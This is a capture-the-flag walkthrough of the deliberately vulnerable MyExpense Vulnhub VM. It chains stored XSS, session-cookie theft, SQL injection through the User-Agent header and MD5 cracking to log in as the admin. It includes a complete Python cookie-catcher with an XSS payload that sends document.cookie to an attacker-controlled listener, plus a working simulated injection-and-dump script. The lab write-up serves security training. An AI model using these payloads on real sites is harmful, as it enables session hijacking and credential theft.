My Expense Vulnhub Walkthrough

Md Tajdar Alam Ansari
9 min readAug 29, 2022

Reconnaissance:

MyExpense is a deliberately vulnerable web application that allows you to train in detecting and exploiting different web vulnerabilities. Unlike a more traditional “challenge” application (which allows you to train on a single specific vulnerability), MyExpense contains a set of vulnerabilities you need to exploit to achieve the whole scenario.

You are “Samuel Lamotte” and you have just been fired by your company “Futura Business Informatique”. Unfortunately, because of your hasty departure, you did not have time to validate your expense report for your last business trip, which still amounts to 750 € for a return flight to your last customer.

Fearing that your former employer may not want to reimburse you for this expense report, you decide to hack into the internal application called “MyExpense “ to manage employee expense reports.

So you are in your car, in the company carpark and connected to the internal Wi-Fi (the key has still not been changed after your departure). The application is protected by username/password authentication and you hope that the administrator has not yet modified or deleted your access.

Your credentials were: samuel/fzghn4lw

Once the challenge is done, the flag will be displayed on the application while being connected with your (samuel) account.

Link to the VM is: https://www.vulnhub.com/entry/myexpense-1,405/

Lab setup:

The machine is deployed on VirtualBox, since the Vulnhub page itself says to use VirtualBox rather than VMware. Importing is just a matter of clicking the import button and selecting the MyExpense.ova image.

Once imported, the VM boots and is ready. If it does not seem to be working properly, check its settings, in particular that its network adapter is on the same network as the attacking machine, because the next step locates it with ARP.

Scanning:

  • Arp Scan

Recon is followed by scanning and enumeration.

First we find the VM's IP address with an ARP scan: sudo arp-scan -l (short for --localnet) lists every host answering ARP on the local network segment, which here is the Wi-Fi network both machines share. ARP is not routed, so the VM has to be on the same segment for this to work.

  • Nmap Scan

Using nmap we find the open ports and the services running on them.

For that we run nmap -sC -sV -A [IP of the machine] (-A already enables -sC and -sV, plus OS detection and traceroute, so nmap -A alone gives the same result).

Vulnerability Analysis:

Port 80 (HTTP) is open, so we head there and see what the web page offers.

The site belongs to Futura Business Informatique.

A dirb scan gives us a list of files and directories.

Among them is robots.txt, which points us to an admin page. That page shows a list of user accounts.

Here we can see that Samuel's account is inactive. We cannot activate it ourselves, since that needs admin rights. Let us try to create an account with the “Don't have an account?” button, but it refuses every time. Inspecting the element with Ctrl+Shift+I shows that the button carries the disabled attribute, so we remove it in the inspector. This is a purely client-side restriction: the server accepts the registration request regardless, so editing the HTML in DevTools is enough.

After enabling it, we can register an account and use the registration fields to test for XSS.

The payload fires, so the application is vulnerable to stored XSS: what we enter at registration is rendered without escaping when the user list is displayed.

So the next step is to activate Samuel's account by stealing the admin's session cookie, the technique popularly known as “cookie stealing”.

Exploitation:

To steal the admin's cookie we host a small PHP script on our machine that receives the cookie sent by the XSS payload and writes it to a file. This is a cookie-catcher, not “PHP poisoning”.

First free port 80 by stopping Apache with sudo service apache2 stop, then write the PHP cookie-stealer.

Save it as a .php file in /var/www/html/ (the script was shown as a screenshot in the original post).

Now serve that directory with PHP's built-in web server, using the following command:

sudo php -S [base/local machine IP]:[port number] -t /var/www/html

We use port 80 so the payload can reference a plain http://IP/ URL without a port; any port works as long as the payload matches it (sudo is needed to bind a port below 1024).

Next we need an XSS payload on the web page: a script that sends document.cookie to that listener. We register an account with the payload in one of the registration fields, since those are the fields rendered unescaped on the admin's user list.

Back in the terminal we wait for the cookie to be sent back. When the admin views the user list the payload fires, and voilà, we have the admin's session cookie. (This works only because the session cookie is not flagged HttpOnly; with that flag document.cookie would not expose it.)

The next step is to replace our own session cookie with the stolen one using the Cookie-Editor browser addon.

With that cookie set, we are logged in with admin privileges.

Samuel's user ID is 11 and his account still has to be activated.

For that we register yet another account, this time with a payload that fires on /admin/admin.php and sends the request that activates ID 11, again taking advantage of the stored XSS.

Refreshing the user list shows Samuel's account as active.

The next thing for us to do is to login into Samuel’s account using the credentials given to us.

User: slamotte

Pass: fzghn4lw

Now we need to complete Samuel's side of the workflow: his pending expense report has to be submitted, which is done by clicking the tick mark.

His personal information page names his manager, Manon Riviere, who has to approve the report. Using the same cookie-stealing technique as before, we need to capture her session cookie.

Before that we check whether XSS also works on this page, using the comment box of the expense report.

It does.

Now for Manon's cookie. We copy the cookie-stealer to a new .php file in the same location (only the file name changes, to keep the two captures separate and to save typing) and point a new payload, placed in the comment box, at it.

We must also restart the listener so it serves the new file. Back in the terminal we find that several cookies have been captured: every user who views the comment fires the payload.

Each of those cookies belongs to a different user, so it is a matter of trial: swap in the first cookie, see whose account we land in, and move on until one of them is the manager's.

Eventually we land in Manon's account.
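Both captures above (the admin's cookie via the registration fields, and Manon's via the comment box) use the same listener. The following is an added example of that listener written in Python's standard library rather than PHP; it is my code, not the script from the original post or from the VM. It assumes a query parameter named c, a listener address of 10.0.2.15 and a cookie name of PHPSESSID, all illustrative. Because the second capture returns several sessions at once, the listener records time, source IP, User-Agent and Referer for each hit, which is the only information available for telling the cookies apart before trying each one.

```python
#!/usr/bin/env python3
"""Cookie-catcher listener, a stdlib stand-in for the PHP cookie stealer.

Run on the attacking machine (port 80 so the payload needs no port number),
point the stored-XSS payload at it, and each victim browser that renders the
payload reports its document.cookie here.  Assumptions: the listener address
(10.0.2.15) and the cookie name PHPSESSID are illustrative, not taken from the VM.
"""
import datetime
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlparse

PARAM = "c"                 # query parameter the payload puts the cookie in
LOG_FILE = "cookies.log"    # one JSON line per capture


def build_payload(listener_url: str, param: str = PARAM) -> str:
    """Payload to paste into a registration field or the comment box.

    Requesting an image from the listener with document.cookie in the query
    string works from any origin (no XHR, no CORS), which is why this classic
    form is enough.  Only cookies without the HttpOnly flag are readable.
    """
    base = listener_url.rstrip("/")
    return (
        "<script>new Image().src="
        f"'{base}/?{param}='+encodeURIComponent(document.cookie);"
        "</script>"
    )


def parse_cookies(path: str, param: str = PARAM) -> dict:
    """'/?c=PHPSESSID%3Dabc%3B%20lang%3Dfr' -> {'PHPSESSID': 'abc', 'lang': 'fr'}."""
    raw = parse_qs(urlparse(path).query).get(param, [""])[0]
    cookies = {}
    for pair in raw.split(";"):
        name, sep, value = pair.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def make_entry(path: str, remote_ip: str, user_agent: str, referer: str,
               when: Optional[datetime.datetime] = None) -> dict:
    """Build one log record.

    Time, source IP, User-Agent and Referer are recorded on purpose: when the
    payload sits in a comment that several users open, each capture is a
    different session and these fields are the only hints for telling them
    apart before trying each cookie in turn.
    """
    when = when or datetime.datetime.now(datetime.timezone.utc)
    return {
        "time": when.isoformat(timespec="seconds"),
        "ip": remote_ip,
        "user_agent": user_agent,
        "referer": referer,
        "cookies": parse_cookies(path),
    }


class CatcherHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        entry = make_entry(
            self.path,
            self.client_address[0],
            self.headers.get("User-Agent", ""),
            self.headers.get("Referer", ""),
        )
        line = json.dumps(entry)
        with open(LOG_FILE, "a", encoding="utf-8") as fh:
            fh.write(line + "\n")
        print(line, flush=True)
        self.send_response(204)   # no body: the victim's <img> just fails quietly
        self.end_headers()

    def log_message(self, *_):    # keep stdout to our own JSON lines
        pass


def serve(host: str = "0.0.0.0", port: int = 80) -> None:
    """Same role as `sudo php -S IP:80`; binding port 80 needs root."""
    print(f"listening on {host}:{port}; payload e.g. {build_payload('http://10.0.2.15')}")
    HTTPServer((host, port), CatcherHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

Run it with sudo python3 catcher.py, paste the printed payload (with your own IP) into the registration field or the comment box, and watch cookies.log. Each line is one victim; when several arrive, the ip and referer fields usually narrow down which session is the manager's before you start swapping cookies in the browser.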

Let's wrap up Samuel's work.

As Manon, we validate each of his reports.

With all the reports validated, the remaining task is to find the admin credentials. For that we need a request that the server answers with 200; browsing the Network tab of the developer console shows the requests the page makes.

The User-Agent header of those GET requests ends up in the database, so we use it for SQL injection. Since its value is later displayed on the manager's dashboard, that is where the injected results surface.

Finally we need a payload to send in that header.

Using the Inspector tab we learn that the admin has id=2.

Now all we need to do is run the exploit script.

When the script has finished we have the table names we need in order to reach the admin credentials.

The dumped table listing appears under Manon's account (I forgot to take a screenshot, but it is right there on the dashboard).

Next we use a payload that dumps the rows of the user credentials table (dump, not drop: a DROP would delete the table, and we want its contents).

As a result we get all user credentials, just like that.

But there is one final step: the passwords are stored as hashes. Hashcat or John the Ripper can crack them offline, and an online lookup such as CrackStation works for unsalted hashes of common passwords. Essentially any one is fine as long as it works; I am going to use CrackStation, which I use out of habit. So let us copy the hash of Paul Baudouin, since he appears to be the admin.

CrackStation returns HackMe; the hash is plain, unsalted MD5.
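The injection, the dump and the hash crack above, as one added example. This is my code, not the author's exploit script or the VM's source: it models the bug described (the User-Agent header spliced into an INSERT and later shown on the manager's dashboard) against an in-memory SQLite database so it runs offline. The table and column names, the connection-log table and the sample rows are constructed assumptions, not the VM's real schema; SQLite concatenates with || where MySQL, the real target, needs CONCAT(), and the MySQL forms are noted in comments. The hardened version with a bound parameter is included so the two can be compared.

```python
#!/usr/bin/env python3
"""Simulated User-Agent SQL injection, dump and crack, offline.

The real application is PHP/MySQL; this stand-in uses an in-memory SQLite
database so it runs anywhere.  Table names, column names and the sample rows
are constructed for the example and are not the VM's real schema; the MySQL
equivalents of the SQLite-specific parts are given in comments.
"""
import hashlib
import re
import sqlite3
from typing import Dict, Optional


def md5_hex(text: str) -> str:
    """Unsalted MD5, the scheme CrackStation identified for the dumped hashes."""
    return hashlib.md5(text.encode()).hexdigest()


class App:
    """Model of the bug: every request's User-Agent is written to a log table,
    and the manager's dashboard later prints that table, which is where the
    injected results surface."""

    def __init__(self, safe: bool = False):
        self.safe = safe
        self.db = sqlite3.connect(":memory:")
        self.db.executescript("""
            CREATE TABLE user(id INTEGER, username TEXT, password TEXT, role TEXT);
            CREATE TABLE connection_log(ip TEXT, user_agent TEXT);
        """)
        self.db.executemany("INSERT INTO user VALUES (?, ?, ?, ?)", [
            (2, "pbaudoin", md5_hex("HackMe"), "admin"),    # admin has id=2
            (11, "slamotte", md5_hex("fzghn4lw"), "user"),  # Samuel, id=11
        ])

    def handle_request(self, ip: str, user_agent: str) -> None:
        if self.safe:
            # hardened: the header is bound as data and can never become SQL
            self.db.execute("INSERT INTO connection_log VALUES (?, ?)", (ip, user_agent))
        else:
            # vulnerable: the header is spliced straight into the statement
            self.db.execute(
                f"INSERT INTO connection_log VALUES ('{ip}', '{user_agent}')")

    def dashboard(self):
        """What the manager (Manon) sees: one row per logged request."""
        return self.db.execute("SELECT ip, user_agent FROM connection_log").fetchall()


# --- attacker side -----------------------------------------------------------
LEFT, RIGHT = "<<", ">>"   # markers so the result can be cut out of the page


def inject(subquery: str) -> str:
    """Close the literal, concatenate a subquery's result, reopen the literal.
    SQLite concatenates with ||; on MySQL use CONCAT('<<', (subquery), '>>')."""
    return f"{LEFT}' || ({subquery}) || '{RIGHT}"


# enumerate tables; MySQL: SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()
LIST_TABLES = "SELECT group_concat(name) FROM sqlite_master WHERE type='table'"
# dump credentials; MySQL: SELECT group_concat(concat(username, ':', password)) FROM user
DUMP_CREDS = "SELECT group_concat(username || ':' || password) FROM user"


def extract(user_agent_cell: str) -> str:
    """Return the text between the markers, or '' when nothing was injected."""
    if LEFT in user_agent_cell and RIGHT in user_agent_cell:
        start = user_agent_cell.index(LEFT) + len(LEFT)
        return user_agent_cell[start:user_agent_cell.rindex(RIGHT)]
    return ""


def parse_creds(dump: str) -> Dict[str, str]:
    """'user:hash,user2:hash2' -> dict, keeping only 32-hex (MD5-shaped) hashes."""
    creds = {}
    for item in dump.split(","):
        name, sep, digest = item.partition(":")
        if sep and re.fullmatch(r"[0-9a-f]{32}", digest):
            creds[name] = digest
    return creds


def crack_md5(target: str, wordlist) -> Optional[str]:
    """Dictionary attack on one unsalted hash (a lookup table does this at scale)."""
    for candidate in wordlist:
        if md5_hex(candidate) == target:
            return candidate
    return None


def run(app: App) -> dict:
    """Full chain as in the walkthrough: list tables, dump the user table, crack."""
    attacker_ip = "10.0.2.4"                                   # constructed
    app.handle_request(attacker_ip, inject(LIST_TABLES))
    app.handle_request(attacker_ip, inject(DUMP_CREDS))
    cells = [ua for _, ua in app.dashboard()]
    tables = extract(cells[-2])
    creds = parse_creds(extract(cells[-1]))
    wordlist = ["password", "123456", "HackMe", "letmein"]    # constructed
    cracked = {user: crack_md5(h, wordlist) for user, h in creds.items()}
    return {"tables": tables, "creds": creds, "cracked": cracked}


if __name__ == "__main__":
    print("vulnerable:", run(App(safe=False)))
    print("hardened:  ", run(App(safe=True)))
```

Against the vulnerable App the dashboard rows carry the table list and the username:hash pairs between the markers, and the dictionary attack recovers HackMe for pbaudoin. Against the hardened App the same two requests are stored as literal text, the markers wrap SQL instead of data, and parse_creds finds nothing, which is the whole difference a bound parameter makes.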

So, let’s get our work done and login to get the flag.

USER: pbaudoin

PASS: HackMe

Login to admin was successful.

And here we get the flag{H4CKY0URL1F3}

Conclusion:

This VM contains a lot of challenges to work through: stored XSS, session cookie theft, bypassing a client-side control (removing a disabled attribute in DevTools), hosting a PHP cookie-catcher, SQL injection through the User-Agent header, hash cracking and privilege escalation by session hijacking. Overall this was a fun VM which took me a lot of time to solve. Initially I was unable to solve it due to my lack of knowledge of cookie stealing, but since I was allowed to access YouTube I watched this video https://www.youtube.com/watch?v=T1QEs3mdJoc on cookie stealing by @Computerphile, which was of great help to me. Thanks a lot for reading my PoC on this Vulnhub VM.

The link to this VM is present at the top of this PoC.

Thank you! Have a Hacky Day!
